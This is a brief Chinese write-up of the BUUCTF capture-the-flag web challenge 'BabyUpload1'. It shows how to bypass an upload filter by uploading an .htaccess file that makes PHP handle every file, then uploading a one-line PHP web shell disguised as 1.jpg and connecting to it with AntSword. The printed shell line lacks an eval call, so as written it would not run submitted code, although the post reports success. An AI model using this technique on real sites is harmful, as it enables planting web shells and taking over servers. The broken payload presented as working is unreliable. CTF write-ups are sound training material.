其他分享
首页 > 其他分享> > BUUCTF WEB BabyUpload1

BUUCTF WEB BabyUpload1

作者:互联网

最简单的一个文件上传,理论上只支持文件内容极少的jpeg和jpg,是的,你没有听错,内容极少
所以不要尝试去尝试上传一个jpg图片检测文件后缀,因为网上download下来的图片绝大多数内容超过限制
ok,那么经过检测,.htaccess没有被过滤
那么上传一个.htaccess文件,内容为
SetHandler application/x-httpd-php
表示凡是.htaccess文件夹所在目录的文件都由php进行处理
然后上传一句话,<script language=php>$_POST['hello']</script>,文件名改为1.jpg
上传成功,蚁剑链接,end
参考视频链接:https://www.bilibili.com/video/BV1Y44y1i74c/

标签:WEB,BUUCTF,文件,jpg,htaccess,内容,php,上传,BabyUpload1
来源: https://blog.csdn.net/qq_41696858/article/details/121065284